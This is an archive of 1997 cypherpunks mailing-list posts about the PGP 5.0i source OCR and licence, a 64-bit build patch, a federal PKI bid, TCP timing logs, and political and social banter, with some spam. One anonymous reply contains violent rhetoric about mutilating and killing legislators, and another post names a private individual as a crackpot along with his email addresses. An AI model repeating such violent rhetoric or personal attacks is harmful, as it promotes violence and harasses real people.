munge and unmunge :).

> Besides, this way it's easier to spot the errors simply by comparing, with
> bar-codes and such you'd never ever be able to look at the errors yourself
> and find them.

You would normally bury a lot of ECC within the bar codes, so that unless
the dog would eat the page, it would be able to reconstruct the whole, or
even take the "munge" images and barcode those lines.

--- reply to tzeruch - at - ceddec - dot - com ---






From stewarts at ix.netcom.com  Mon Aug 11 12:45:07 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 12 Aug 1997 03:45:07 +0800
Subject: Feds Seek PKI Bids
In-Reply-To: <970811135334.2020461b@hobbes.orl.lmco.com>
Message-ID: <3.0.2.32.19970811123259.03057908@popd.ix.netcom.com>



At 01:53 PM 8/11/97 -0400, A. Padgett Peterson P.E. Information Security
wrote:
>>USG published a solicitation today in the CBD for a
>>Public Key Infrastructure which outlines the system
>>requirements:
>>   http://jya.com/pkicbd.htm
>
>Interesting from what is *not* there - any mention of key recovery/key 
>escow. Looks like they may finally understand what a Certificate Authority
>is (not holding breath). Do not think much of appelations (Classic & Gold)
>and suspect they may need more than two but sounds like a good start.

I'm not sure that it's not there; I'd have to read it three or four more times
to be sure, but I got the impression it was hidden in the fine print.  
The interesting phrase, in the description of "Classic" Certs, is
	"Generation and storage of an asymmetric key pair 
	can be accomplished via software." 
and for "Gold" Certs,
	"Generation and storage of asymmetric key pairs must be performed 
	and protected in hardware."
which sounds like it's implying that the CA will generate the 
asymmetric key pairs rather than the user.  I'm sure the interesting
details are hidden in the parts that weren't in the CBD announcement,
which is normally just an abstract of a procurement.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From whgiii at amaranth.com  Mon Aug 11 14:07:56 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Tue, 12 Aug 1997 05:07:56 +0800
Subject: Can't touch this, ugly Americans! (PGP License file)
In-Reply-To: <97Aug11.145941edt.32258@brickwall.ceddec.com>
Message-ID: <199708111937.OAA05635@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In <97Aug11.145941edt.32258 at brickwall.ceddec.com>, on 08/11/97 
   at 03:00 PM, nospam-seesignature at ceddec.com said:

>On Mon, 11 Aug 1997, Adam Shostack wrote:

>> First off, congratulations and thanks to Stale and everyone else for
>> scanning in the source to PGP5.0i (http://www.ifi.uio.no/pgp/)
>> 
>> However, theres an ugly problem with the license.
>> (http://www.ifi.uio.no/pgp/pgp50i-license.txt)
>> 
>> In Section 1.c.(d), permission is given to port PGP to other
>> platforms.  However, permission to distribute those ports is
>> explicitly denied.
>> 
>> Could the license be modified to allow people who port the software to
>> redisctribute ports?  There is enough FUD about using PGP without PGP,
>> Inc contributing to that by overly tight licensing.
>> 
>> Adam

>Or what do you do about bugs?  It mentions corrections, but not who to
>send them to.

>On DEC Alpha/axp under Linux, include/pgpUsuals.h has a test for a big
>ULONG_MAX that defines HAVE64 as 1 on 64 bit machines like the alpha

>But the very next test has #ifndef HAVE64 where there is a typedef for
>word64, which won't happen.  But if HAVE64 is 1, in pgpMD5.c it will
>really want word64 defined or it will bomb. 

>Something is wrong, but if I copy the typedef, it seems to get further
>(compiling as we speak - the old UDBs aren't the fastest alphas).

>Now, where should I send this information or the patch?

Here is a patch I received for the pgpUsuals.h file:


There is a bug in src/lib/pgp/include/pgpUsuals.h on 64-bit machines. The
appended patch seems to cure the problem --- the word64 type needs to be
defined, even when the machine has a native 64-bit type.


*** src/lib/pgp/include/pgpUsuals.h~    Sat Aug  9 22:44:58 1997 ---
src/lib/pgp/include/pgpUsuals.h     Mon Aug 11 11:03:38 1997
***************
*** 52,57 ****
- --- 52,58 ----
  #if ULONG_MAX == 0xfffffffffffffffful
  typedef ulong bnword64;
  #define BNWORD64 bnword64
+ typedef ulong word64;
  #define HAVE64 1
  #endif
  #endif



- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM+9cF49Co1n+aLhhAQEtSAQAyF1tsGfk7gxtPY20dsdIrrc0nAVcpnDt
zWideMkJG+WsnnFlhFQBWCwMzMswRJJlqxy4shegZDSBgLLuYN+5SVNrRufChFYX
Ob9VS4xWM8lJAewZeH5GNqNokrE2wjhMrkKJ0RDr1f7RvmLN+Bpa6K3/UqtaVYAA
tw1hbhz8teU=
=e/pP
-----END PGP SIGNATURE-----






From adejoode at replay.com  Mon Aug 11 14:31:48 1997
From: adejoode at replay.com (Alex de Joode)
Date: Tue, 12 Aug 1997 05:31:48 +0800
Subject: No Subject
Message-ID: <199708112117.XAA29277@basement.replay.com>



Subject: Re: Can't touch this, ugly Americans! (PGP License file)
Newsgroups: list.cypherpunks
Organization: Replay and Company UnLimited.

Adam Shostack sez:

: First off, congratulations and thanks to Stale and everyone else for
: scanning in the source to PGP5.0i (http://www.ifi.uio.no/pgp/)

It was mostly an Brit effort (with some dutch and german help).


They did sweat labour for two days, so a thank you guys is certainly
in order.



        T H A N K  Y O U  A L L  ! !


 -aj-






From sunder at brainlink.com  Mon Aug 11 14:36:46 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Tue, 12 Aug 1997 05:36:46 +0800
Subject: Comments on PGP5.0 OCR (was Re: fyi, pgp source now available , internationally)
In-Reply-To: <97Aug11.152045edt.32259@brickwall.ceddec.com>
Message-ID: 



On Mon, 11 Aug 1997 nospam-seesignature at ceddec.com wrote:

> Not quite.  If you read closely, the EAR says something about reserving
> judgment on OCR publications.  You didn't use a specific OCR font, but you
> did put all kinds of other OCR helps in, which should by itself cloud the
> issue.  It would be nice if it was resolved.

Um, how about a CRC for every character of every line published
electronically?  (hehehhe...  Oh, and of course we'll use 32 bit CRC's of
8 bit characters, of course...)

Hidden text of this message not visible to feds for those without
imagination: (yeah, right) all one would need is to build a table of 255
CRC's, take the 32 bit CRC code and reverse lookup the data. :) 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From kent at songbird.com  Mon Aug 11 14:51:56 1997
From: kent at songbird.com (Kent Crispin)
Date: Tue, 12 Aug 1997 05:51:56 +0800
Subject: Triple-DES blues (was Re: some hashcash advocacy)
In-Reply-To: <19970809223727.64534@bywater.songbird.com>
Message-ID: <19970811143802.28814@bywater.songbird.com>



On Mon, Aug 11, 1997 at 08:56:07AM +0100, Adam Back wrote:
> 
[...]
> 
> Well here's DES... shouldn't be hard to construct a 3DES out of it
[...]

I will try this.

> 
> How high can you crank up the bit rate?  How about pgp.exe (270k or so
> from pgp263)?

Say 300k.

I think the lower limit would be about twice the imput file size. 
Playing time: suppose each byte in the input was a single note, and,
say 30 notes/sec (damn dense music).  10k seconds.  About 3 hours
long.  Also, 30 notes/sec is too dense for any pitch-to-midi to work.

Not really very practical :-)

> Couldn't you sample voices, and use that through a vocoder?  Say one
> line of the music was DES above which would come out as a real short
> burst... even pgp.exe at 270k wouldn't be that long at stereo CD
> quality sample, right?

Totally different technology than midi, of course.  Certainly you
could treat any data as a sample.  The interesting question to me is
whether anything aesthetically meaningfull could be generated --
pgp.exe as a sound sample would just be a short white noise-ish clip,
probably -- "PGP - the noise".

Once again, there seems to be no practical value to such an encoding,
that I can think of at least, so aesthetics are the only reason to
generate something.  Midi gives you the opportunity of mirroring
textual patterns in sound, and since text is meaningful, the game I am
playing is to try to make a musical meaning out of it.  It's kind of 
fun... 

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From azur at netcom.com  Mon Aug 11 15:57:44 1997
From: azur at netcom.com (Steve Schear)
Date: Tue, 12 Aug 1997 06:57:44 +0800
Subject: The slippery slope
Message-ID: 




		Justice Brennan and the slippery slope


by Joseph Sobran

The legacy of William Brennan, who died last week at 91, is summed up in
the phrase "judicial activism." In an editorial eulogy, The New York Times
praised him for his belief that "the Constitution was a living document
that could and should be interpreted aggressively," as opposed to "the
narrow, static doctrine of original intent, the notion that the
Constitution can best be interpreted through the eyes of the Framers."

Brennan himself attacked the idea of seeking the Framers' original intent
as "arrogance in the cloak of humility." Apparently his own notion of
humility was satisfied by giving the Constitution meanings nobody had ever
suspected it of containing. Or, as he put it, the "genius" of the
Constitution lay in the adaptability of its great principles to cope with
current problems and needs."

In plain language, Brennan imposed his own liberal agenda and said it was
the Constitution speaking. He was ofton able to muster majorities on the
Supreme Court to join him in this judicial ventriloquism. But even when his
goals were worthy, his methods were despotic.

In landmark opinions, Brennan held that the Constitution forbids the states
to apportion their legislatures in their own ways, to define libel as they
see fit, to cut off welfare benefits without a hearing, to ban the
distribution of contraceptives to unmarried people, and to require public
schools to balance the teaching of evolution with the teaching of theistic
doctrines of creation; he also concurred in rulings forbidding the states
to ban abortion and to execute criminals.

Maybe Brennan knew how the states should have been governed better than the
people of the states did. His various positions can be argued as matters of
policy. But it was dishonest for him and his admirers to pretend that these
positions were constitutional imperatives. And that pretense has done
serious damage to the rule of law.

Ideologically predictable, Brennan made the law itself unpredictable. In
pursuit of his own agenda, he overturned settled understandings and ignored
the clear language of the Constitution. His most important rulings usurped
the powers constitutionally reserved to the states and the people thereby
enlarging - unconstitutionally - the powers of the federal judiciary.

Interpreting the Constitution, Brennan once said, "demands of judges more
than proficiency in logical analysis." Maybe so, but it does demand such
proficiency above all other things, and to disparage reason is to abandon
the quest for stable law. Under jurists like Brennan, we are back where we
started: subject to the arbitrary will of men rather than the irnpersonal
rule of law.

True, the states are often badly governed. On many specific issues they
might have been better ruled by a William Brennan armed with dictatorial
powers than they were hy their own legislatures, if results are everything
and procedure doesn't matter.

But there can be no shortcuts through the Constitution. The individual
rights Brennan cherished are often abused. Is that an argument for ignoring
them even when they are enshrined in law?

Liberals insist that banning pornography is a slippery slope to thought
control. But allowing a government to claim powere never granted to it, a
habit now virtually synonymous with liberalism, is far more surely a
slippery slope to tyranny. After all, every totalitarian state says it is
merely trying to "cope with current problems and needs" when it dispenses
with the inconvenience of the rule of law.

The test of an honest jurist is whether he is willing to rule against his
own preferences, deferring, however reluctantly, to what the law requires
in the case at hand. The law may be wrong the legislature may be derelict,
the people may be corrupt; but still, the law is the law and it must be
honored.

But Brennan's rulings were the triumph of preference over deference. He
ruled without the normal regrets of a justice who sometimes feels compelled
to put the law ahead of his personal desires. For him, as for many of his
generation, the office of Supreme Court justice was an irresistible
opportunity to wield power in the guise of interpreting the law.







From alan at ctrl-alt-del.com  Mon Aug 11 17:23:31 1997
From: alan at ctrl-alt-del.com (Alan)
Date: Tue, 12 Aug 1997 08:23:31 +0800
Subject: Comments on PGP5.0 OCR (was Re: fyi, pgp source now available , internationally)
In-Reply-To: 
Message-ID: 



On Mon, 11 Aug 1997, Ray Arachelian wrote:

> On Mon, 11 Aug 1997 nospam-seesignature at ceddec.com wrote:
> 
> > Not quite.  If you read closely, the EAR says something about reserving
> > judgment on OCR publications.  You didn't use a specific OCR font, but you
> > did put all kinds of other OCR helps in, which should by itself cloud the
> > issue.  It would be nice if it was resolved.
> 
> Um, how about a CRC for every character of every line published
> electronically?  (hehehhe...  Oh, and of course we'll use 32 bit CRC's of
> 8 bit characters, of course...)
> 
> Hidden text of this message not visible to feds for those without
> imagination: (yeah, right) all one would need is to build a table of 255
> CRC's, take the 32 bit CRC code and reverse lookup the data. :) 

This sounds absurd but similar things have happened.

The translation team for the Dead Sea Scrolls tried to keep the actual
texts secret so they would be the only ones with the "Official"
translation.  They did, however, publish tables of what words were used
and their location for use by researchers.  A couple of them got the idea
to use the lookup table to reconstruct the text.  The results were a copy
of the original text.  (Needless to say, the "official" translation team
was quite upset.)  It did finally result in the publication of the
scrolls, since the information had been "leaked".

[This sounds like something from RISKS...]

I wonder if it is legal to provide comprehensive cross-references of code.
(Probably not, as the laws seem to be formulated under the legal principle
of "I win, You lose".

alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.






From dlv at bwalk.dm.com  Mon Aug 11 17:29:49 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 12 Aug 1997 08:29:49 +0800
Subject: Guy Polis
Message-ID: 



'punks,

There's a crackpot by the name of Guy Polis (guy at panix.com, polis_guy@
jpmorgan.com) who posts a crackpot "cryptographic manifesto" and sounds
like a bad troll intended to make the folks who promote the use of crypto
look like, well, crackpots. Be warned.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From eb at comsec.com  Mon Aug 11 17:38:37 1997
From: eb at comsec.com (Eric Blossom)
Date: Tue, 12 Aug 1997 08:38:37 +0800
Subject: Masons and Fnords
In-Reply-To: <199708111308.GAA18202@toad.com>
Message-ID: <199708112129.OAA08148@comsec.com>



> Those in the Silicon Valley area might also want to visit the 
> Rosicrucian Museum in San Jose, a similarly funky building,
> belonging to an unrelated group.

They've got lots of desicated folks in display cases for you to look
at too!  Definitely worth seeing.

Eric






From sunder at brainlink.com  Mon Aug 11 17:49:27 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Tue, 12 Aug 1997 08:49:27 +0800
Subject: Masons and Fnords
In-Reply-To: 
Message-ID: 



On Sat, 9 Aug 1997, Tim May wrote:

> (Why do you think the new standard for secure commerce is called SET?)

Bah, why do you think most UNIX shells have the command SET in them?  All
variables are under Set's influence!  setenv's just Set's son. :)

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From wombat at mcfeely.bsfs.org  Mon Aug 11 17:51:37 1997
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Tue, 12 Aug 1997 08:51:37 +0800
Subject: Dr. McVeigh / Re: A peculiar notion
In-Reply-To: <199708110653.AAA22003@wombat.sk.sympatico.ca>
Message-ID: 




> {Warning: Since the side-effects of Black Powder can be substantial,
>  it should only be used in cases where the physician has determined
>  that the benefits of "treatment" outweigh the risks.

Blackpowder is merely a low-order explosive, goof-monger.






From davros at raf.com  Mon Aug 11 18:05:41 1997
From: davros at raf.com (Dave Ross)
Date: Tue, 12 Aug 1997 09:05:41 +0800
Subject: Fw: slow network behavior with Linux kernel 2.0.x
Message-ID: 



Can any of you help us with this mess?  Linux is not my strong suit. 
Thanks!  My engineer is pulling his hair out.  I would appreciate any
suggestions anyone could make.

-dave ross

davros at raf.com


----------
> From: Bruce Thompson 
> To: davros at fred
> Subject: Fw: slow network behavior with kernel 2.0.x
> Date: Tuesday, August 12, 1997 12:18 AM
> 
> 
> 
> ----------
> | From: Bruce Thompson 
> | To: linux-kernel at vger.rutgers.edu
> | Cc: linux-net at vger.rutgers.edu
> | Subject: slow network behavior with kernel 2.0.x
> | Date: Thursday, July 31, 1997 4:40 PM
> | 
> | 
> | My company developes a psuedo real-time client-server system that runs
on
> | linux connected through TCP sockets.  I have been noticing it has been
> | taking the data packets quite a while to reach the clients from the
> server.
> |  After trying several different ethernet cards and speeds (TP vs
> thinnet,10
> | vs 100), I have determined that the slow down only occures when the
> server
> | is running with a linux 2.0.x kernel (I have not tried 2.1.x).  Any
> system
> | running up to 1.3.89 runs fine at full speed. I have not yet tested any
> | kernel between 1.3.89 and 2.0.0
> | 
> | From looking at tcpdumps, it appears that packets are not getting acked
> in
> | a timely way.  I have turned off the 'delayed ack' feature of TCP and
> have
> | not seen any improvement.   Here are some tcpdumps
> | 
> | 
> | Example of what I would expect to be normal.
> | 10:42:17.70 server > client: . 1:1461(1460) ack 98 win 31744 (DF)
> | 10:42:17.70 server > client: . 1461:2921(1460) ack 98 win 31744 (DF)
> | 10:42:17.71 client > server: . ack 2921 win 31744 (DF)
> | 10:42:17.71 server > client: . 2921:4381(1460) ack 98 win 31744
> | 10:42:17.71 server > client: . 4381:5841(1460) ack 98 win 31744
> | 10:42:17.71 server > client: . 5841:7301(1460) ack 98 win 31744
> | 10:42:17.72 client > server: . ack 7301 win 31744 (DF)
> | 10:42:17.72 server > client: P 7301:8760(1459) ack 98 win 31744 (DF)
> | 10:42:17.74 client > server: . ack 8760 win 31744 (DF)
> | 
> | Example of time lost with no ack of the first packet causing a 200ms
> delay,
> | and two acks that cause waits of 40ms and 70ms.
> | 
> | 10:42:22.17 server > client: . 8760:10220(1460) ack 1222 win 31744 (DF)
> | 10:42:22.37 server > client: . 8760:10220(1460) ack 1222 win 31744 (DF)
> | 10:42:22.37 client > server: . ack 10220 win 31744 (DF)
> | 10:42:22.37 server > client: . 10220:11680(1460) ack 1222 win 31744
> | 10:42:22.51 client > server: . ack 11680 win 31744 (DF)
> | 10:42:22.51 server > client: . 11680:13140(1460) ack 1222 win 31744
> | 10:42:22.51 server > client: . 13140:14600(1460) ack 1222 win 31744
> | 10:42:22.52 client > server: . ack 14600 win 31744 (DF)
> | 10:42:22.52 server > client: . 14600:16060(1460) ack 1222 win 31744
> | 10:42:22.59 client > server: . ack 16060 win 31744 (DF)
> | 10:42:22.59 server > client: P 16060:17519(1459) ack 1222 win 31744
(DF)
> | 10:42:22.61 client > server: . ack 17519 win 31744 (DF)
> | 
> | Here is a particularly bad example where the same 8760 byte file took
1.7
> | seconds to be transfered.
> | 
> | 10:17:14.95 server > client: . 1:1461(1460) ack 98 win 31744 (DF)
> | 10:17:15.14 client > server: . ack 1461 win 31744 (DF)
> | 10:17:15.14 server > client: . 1461:2921(1460) ack 98 win 31744
> | 10:17:15.14 server > client: . 2921:4381(1460) ack 98 win 31744
> | 10:17:15.44 client > server: . ack 2921 win 31744 (DF)
> | 10:17:15.44 server > client: . 4381:5841(1460) ack 98 win 31744
> | 10:17:15.45 client > server: . ack 2921 win 31744 (DF)
> | 10:17:15.64 client > server: . ack 2921 win 31744 (DF)
> | 10:17:16.08 server > client: . 2921:4381(1460) ack 98 win 31744
> | 10:17:16.27 client > server: . ack 5841 win 31744 (DF)
> | 10:17:16.27 server > client: . 5841:7301(1460) ack 98 win 31744
> | 10:17:16.57 client > server: . ack 7301 win 31744 (DF)
> | 10:17:16.57 server > client: P 7301:8760(1459) ack 98 win 31744 (DF)
> | 10:17:16.59 client > server: . ack 8760 win 31744 (DF)
> | 
> | In general, the system just seems to be slow in responding to this
> network
> | traffic.  This is a private network for these systems so there should
be
> | now problem with other traffic affecting these timings.  With 1.3.x I
see
> | total transit times on the order of 30ms on the 10Mbps network.
> | 
> | The same hardware that runs slowly with 2.0.x will run quickly with
only
> | the kernel changed.
> | 
> | Any ideas as to what could be causing this?
> | 
> | 
> | Thanks,
> | -------------------------
> | Bruce Thompson
> | RAF Technology
> | (206) 867-0700
> | 
> | 






From admin at gw.mailmaster.com  Mon Aug 11 18:11:54 1997
From: admin at gw.mailmaster.com (D.Reynolds)
Date: Tue, 12 Aug 1997 09:11:54 +0800
Subject: Register Your Web Site To Over 590 Search Engines "Instantly" FREE DOWNLOAD
Message-ID: <19970811194440.01a0bb55.in@mailmaster.com>


If you would like to be removed from our mailing list please
reply to: remove at gw.mailmaster.com

Register Your Web Site To Over 590 Search Engines "Instantly". FREE DOWNLOAD.


  I would like to inform you about an exciting new award winning
product that could both, save you countless hours, and increase
your exposure on the Internet immeasurably! Known as the
Submission Wizard, our program offers web users, such as you
yourself, the ability to automatically submit your site to
over 590 search engines in just one session .
Select from different categories, even countries, the choice is yours.

The submission process is very simple, efficient, and most
importantly fast. All you do is provide standard site
information i.e. site name, address, description,
and a few well chosen keywords, the Submission Wizard
takes this information changes it into the format
required by each different engine, and registers you
web site. It's that simple!

In addition, the Wizard's database of search engines and
directories is constantly being updated every week,
thus giving your site fresh and relevant exposure. Also,
the Wizard allows you to register multiple URL's.

Just imagine the possibilities! Take charge of your web
exposure, try out the Submission Wizard demo FREE by
following the provided hyperlink. We know you'll be as
excited about it as much as we are!

Want to be #1 on the search engines, check out our web page we
will show how to do it with our new publication.

http://www.submissions.com/demo.html

NOTE: If you are using an Apple platform you will need windows
emulation software.

Thank you for your time,
D.  Reynolds
Customer Services.










From nobody at REPLAY.COM  Mon Aug 11 18:22:25 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Tue, 12 Aug 1997 09:22:25 +0800
Subject: The Right to Bare Arms on "The slippery slope" of Capital Hill
Message-ID: <199708120055.CAA02213@basement.replay.com>



Steve Schear wrote:
>                 Justice Brennan and the slippery slope
> by Joseph Sobran
> 
> The legacy of William Brennan, who died last week at 91, is summed up in
> the phrase "judicial activism." 

  When your "activism" is backed with guns, it's called tyranny.

> Or, as he put it, the "genius" of the
> Constitution lay in the adaptability of its great principles to cope with
> current problems and needs."

 e.g. - The "Right to Bare Arms" means that we can charge Capital Hill
with machete's and and cut those fuckers' arms off to keep their fucking
hands out of the public till.
  The "Right to Free Speech" means that we can cut their fucking throats
and free those "honest" words that have been trapped down there ever
since
they got to D.C.

  God, I love an Constitution with "adaptable principles."

> In plain language, Brennan imposed his own liberal agenda and said it was
> the Constitution speaking. 
> But even when his
> goals were worthy, his methods were despotic.
> Under jurists like Brennan, we are back where we
> started:  subject to the arbitrary will of men rather than 
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> the impersonal rule of law.
  ^^^^^^^^^^^^^^^^^^^^^^^^^^

  Exactly. The right wing kills us with weapons and the left wing
kills us with kindness.
  The Constitution has always suffered as much or more under the
judicial influence of Democrats than it has under the influence of
Republicans. The citizen's pocketbook, likewise--the Republicans 
want to spend others' money on weapons and the Democrats want to 
give it to "worthy" causes of "their" choosing.
  If one of their relatives needs a kidney, then the Republicans
want to force drug-dealers and child-pornographers to give them
one of theirs. The Democrats want to hold a lottery so that all
of us are subject to giving them a kidney.
  Constitution!??!??
  How _dare_ you suggest tht drug-dealers have rights? How _dare_
you suggest that someone with no kidneys doesn't have a right to
receive your "spare" one from the government?

> The test of an honest jurist is whether he is willing to rule against his
> own preferences, deferring, however reluctantly, to what the law requires
> in the case at hand.

  Like it or not, when two cops blatantly lie on the witness stand 
(i.e. - telling you that the husband of a murdered woman was not 
considered a "suspect" when they climbed over his fence) then their
evidence should be thrown out. The majority of the nation (and an
elected judge) just coughed and looked at their feet when that 
happened at the "guilty black man's trial," but the "honest" jurists
who held a human life in their hands did not.
  Halfway through the O.J. trial, someone asked me what I thought
the verdict should be. I glanced at the courtroom circus and said,
"I think we should find them _all_ guilty!"
  I have come to the same conclusion regarding our legislators.
If I were on the Supreme Court, I might take into consideration my
need for fertilizer for my garden when deciding their fate. 
(Of course, being a strong Constitutionalist, I would only have their
"Bare Arms," which the Constitution gives me the right to, cut off
to feed my plants.)

  Timothy May points out that things have reached a point where we
no longer need to decide on the "kind" of solution to our problem,
but the "calibre" of the solution (or "megatonnage").
  Robert Hettinga made a good point that, while we may be having a
lot of fun with our discussions about the law and the Constitution,
technology and the economy will likely influence most of the future
direction of eCa$h (as well as privacy and freedom, etc.).
  Sadly, they are both more right than most of us would like to admit.
I would like to think that Republicans and Democrats, the EFF and 
Freeh, the Government and the people, Rodney King and the L.A. cops,
could "all just get along."
  The reason we can't? We have no longer have a Constitution to hold
on to--to balance the stronger against the weaker, the larger against
the smaller, the "little" rights and wrongs against the "big" rights
and wrongs.

> But Brennan's rulings were the triumph of preference over deference.
> For him, as for many of his
> generation, the office of Supreme Court justice was an irresistible
> opportunity to wield power in the guise of interpreting the law.

  So we end up with legisltors who now have the power to give our
money to the rich _or_ to the poor depending on who holds power,
and they have the power to kill us with weapons _or_ with kindness 
when they hold the majority.
  We are governed by those who think that "The answer to blatantly
unconstitutional laws, is _more_ unconstitutional laws." and "The
Legislature interprets the Constitution as damage, and routes
around it."

"A Vote for TruthMonger is a Vote for Fear, Uncertainty and Doubt."

   Perhaps we need to start a FUD Party. Run a multi-user persona
candidate, such as TruthMonger. (MayMonger, TreiMonger, SchearMonger,
snowMonger, CrispinMonger). We can each gather our own brand of
faithful under a common flag, telling each faction whatever kind
of FUD they want to hear before they will vote for us, and become
the next majority.
  Once we are in power...we restore the Constitution, throw out all
other laws, and starch the flag (so that nobody can wrap themself
in it). Then we quit.

{Disclaimer: The fault in the idea espoused above lies in the fact
that I (and proably many others) cannot hold it in my mind for more
than a few seconds before I invariably start thinking about a few,
small "improvements" I could make before resigning.}
("I have met the enemy, and he is _me_.")

TruthMangler
p.s. - Or, how about, "If elected, we promise to kill ourselves."?






From trei at process.com  Mon Aug 11 18:49:48 1997
From: trei at process.com (Peter Trei)
Date: Tue, 12 Aug 1997 09:49:48 +0800
Subject: Guy Polis
In-Reply-To: 
Message-ID: <33EFBC08.7918@process.com>



Dr.Dimitri Vulis KOTM wrote:
> There's a crackpot by the name of Guy Polis (guy at panix.com, polis_guy@
> jpmorgan.com) who posts a crackpot "cryptographic manifesto" and sounds
> like a bad troll intended to make the folks who promote the use of crypto
> look like, well, crackpots. Be warned.

Tim May wrote:
>  Yeah, and like we're gun-nuts, too!

Rabid Wombat wrote:
>The mammalian jackass is also claiming that all crypto promoters 
> are marsupials.

  As long as he doesn't accuse us of of being mathematicians...
Does anyone remember what 5 + 7 is equal to? (Send the answer by
encrypted, private email. Secrecy is essential to my work.)

Peter Trei
trei at process.com







From tcmay at got.net  Mon Aug 11 18:52:15 1997
From: tcmay at got.net (Tim May)
Date: Tue, 12 Aug 1997 09:52:15 +0800
Subject: Guy Polis
In-Reply-To: 
Message-ID: <33EFB850.5B50@got.net>



Dr.Dimitri Vulis KOTM wrote:
> There's a crackpot by the name of Guy Polis (guy at panix.com, polis_guy@
> jpmorgan.com) who posts a crackpot "cryptographic manifesto" and sounds
> like a bad troll intended to make the folks who promote the use of crypto
> look like, well, crackpots. Be warned.

  Yeah, and like gun-nuts, too!

--Tim May, OTE, RC, KT, GNU-NTU

There's something wrong when I'm a felon under an increasing number of
laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms,
zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information
markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information
superhighway."







From wombat at mcfeely.bsfs.org  Mon Aug 11 19:05:02 1997
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Tue, 12 Aug 1997 10:05:02 +0800
Subject: Guy Polis
In-Reply-To: 
Message-ID: <33EFBCAD.5D8@mcfeely.bsfs.org>



Dr.Dimitri Vulis KOTM wrote:
> There's a crackpot by the name of Guy Polis (guy at panix.com, polis_guy@
> jpmorgan.com) who posts a crackpot "cryptographic manifesto" and sounds
> like a bad troll intended to make the folks who promote the use of crypto
> look like, well, crackpots. Be warned.

Tim May wrote:
>  Yeah, and like we're gun-nuts, too!

The mammalian jackass is also claiming that all crypto promoters 
are marsupials.

-rw






From nobody at neva.org  Mon Aug 11 20:47:40 1997
From: nobody at neva.org (Neva Remailer)
Date: Tue, 12 Aug 1997 11:47:40 +0800
Subject: I'd _like_ to share my source code, but...
Message-ID: <199708120307.WAA13721@dfw-ix15.ix.netcom.com>




Peter Trei forged:

> Does anyone remember what 5 + 7 is equal to? (Send the answer by
> encrypted, private email. Secrecy is essential to my work.)

  For immediate employment contact .

  Or, if you are merely working on a bid for the following,
>USG published a solicitation today in the CBD for a
>Public Key Infrastructure which outlines the system
>requirements:
then, 5 + 7 = 14 (Close enough for government work!)







From announce at lists.zdnet.com  Mon Aug 11 21:06:20 1997
From: announce at lists.zdnet.com (announce at lists.zdnet.com)
Date: Tue, 12 Aug 1997 12:06:20 +0800
Subject: Enter the ZDNet Channel Surfing Sweepstakes!
Message-ID: 



------------------------------------------------------------------
   ZDNET ANNOUNCEMENT        8/12/97
------------------------------------------------------------------

**** Win a FREE PC or a $5,000 Shopping Spree! ****

Join ZDNet's Channel Surfing Sweepstakes:

http://www.yoyosyndication.com/zdnet/

Would you like to win a fully loaded Gateway 2000 PC
with MMX technology or a $5,000 shopping spree from Computer 
Shopper NetBuyer? Then join ZDNet's Channel Surfing 
Sweepstakes and you can earn chances to win just for
surfing your favorite computing site!

We'll be awarding three Monthly prizes of a Gateway 2000 
computer and a Grand Prize of a $5,000 shopping spree. 
It's easy to join in the fun and you'll have at least 13 new 
chances to win every week! 

Just log on to:

http://www.yoyosyndication.com/zdnet/

and start surfing for prizes today!

_______________________________________________________________
ZDNet Announcements are periodic notices of new features,
special events and free offers available to members of ZDNet.

 --To subscribe to ZDNet Announcements, please send mail to:
announce-on at lists.zdnet.com
You can leave the subject and body blank.

 --To unsubscribe to ZDNet Announcements, please send mail to:
